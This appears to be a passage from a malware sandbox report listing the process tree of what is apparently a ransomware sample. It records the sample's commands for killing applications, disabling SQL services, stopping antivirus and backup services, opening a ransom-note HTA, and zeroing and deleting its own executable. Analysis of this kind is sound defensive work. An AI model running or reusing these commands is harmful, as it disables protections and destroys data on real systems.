C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:2356
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:4896
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:4280
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y3⤵PID:2856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵PID:2416
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵PID:3840
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:4804
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:4912
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta3⤵PID:4564
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”3⤵PID:4296
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 34⤵
- Runs ping.exe
PID:4828
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”4⤵PID:4524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\file.exe3⤵PID:4104
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4724
-
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:4732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:3080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:4652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:5044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:5876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:5868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:5884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:5860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:5852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:184